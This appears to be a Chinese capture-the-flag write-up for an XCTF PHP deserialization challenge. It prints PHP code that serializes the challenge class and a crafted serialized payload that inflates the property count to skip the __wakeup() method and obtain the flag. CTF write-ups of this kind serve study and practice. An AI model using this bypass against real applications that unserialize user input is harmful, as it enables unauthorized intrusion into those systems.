xctf类不完整,少了一个大括号。
并且给了?code 提示我们用url进行对code进行赋值
我们可以利用code进行执行url输入。
题目是Unserialize提醒我们是反序列化。所以我们尝试输入序列化后的代码付给code看看会发生,什么。
用下面的网址进行运行php
demo_func_string_serialize 在线代码实例_w3cschool
<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
$a=new xctf();
echo serialize($a)
?>
O:4:"xctf":1:{s:4:"flag";s:3:"111";}
将序列化后的代码赋值给code(注意一定要对xctf类进行序列化,对我们自己定义的类进行序列胡化,后台在进行反序列化的时候会找不到类而无法识别)
因此我们得知code=是可以进行反序列化。
在xctf类中,定义了魔法方法__wakeup(),在反序列化时调用会先调用__wakeup(),然后就运行了exit并输入bad request 。
因此要拿到flag。我们必须既要反序列化xctf类并且绕过wakeup方法。
__wakeup()函数漏洞原理:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。因此,需要修改序列化字符串中的属性个数:
O:4:"xctf":3:{s:4:"flag";s:3:"111";}
拿到flag
关于反序列化和反序列化漏洞参考